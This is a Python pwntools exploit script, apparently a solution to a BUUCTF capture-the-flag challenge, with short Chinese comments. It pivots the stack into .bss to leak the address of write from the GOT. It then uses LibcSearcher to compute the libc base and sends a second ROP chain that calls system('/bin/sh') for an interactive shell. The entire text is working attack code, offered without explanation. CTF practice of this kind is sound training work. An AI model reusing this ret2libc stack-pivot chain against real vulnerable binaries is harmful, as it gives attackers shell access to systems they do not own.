from pwn import *
from LibcSearcher import *
#p=remote('node4.buuoj.cn',25986)
p=process('./a')
context(arch='i386',os='linux',log_level='debug')
e=ELF('./a')
level_ret_addr = 0x08048511
bss_addr = 0x0804A300
binsh_addr = 0x0804A300 + 4*4
#利用libc獲取system的地址
write_plt = e.plt['write']
write_got = e.got['write']
main_addr = 0x08048513
payload01 = b'aaaa' + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
payload02 = b'a'*0x18 + p32(bss_addr)+p32(level_ret_addr)
p.recvuntil("What is your name?")
p.send(payload01)
p.recvuntil("What do you want to say?")
p.send(payload02)
write_addr = u32(p.recv(4))
o = LibcSearcher('write',write_addr)
libc_base = write_addr - o.dump('write')
#棧遷移
system_addr = libc_base + o.dump('system')
payload1 = b'aaaa' + p32(system_addr) + p32(0) + p32(binsh_addr) + b'/bin/sh'
# p.recv()
p.recvuntil("What is your name?")
p.send(payload1)
p.recv()
payload2 = b'a'*0x18 + p32(bss_addr)+p32(level_ret_addr)
p.send(payload2)
p.interactive()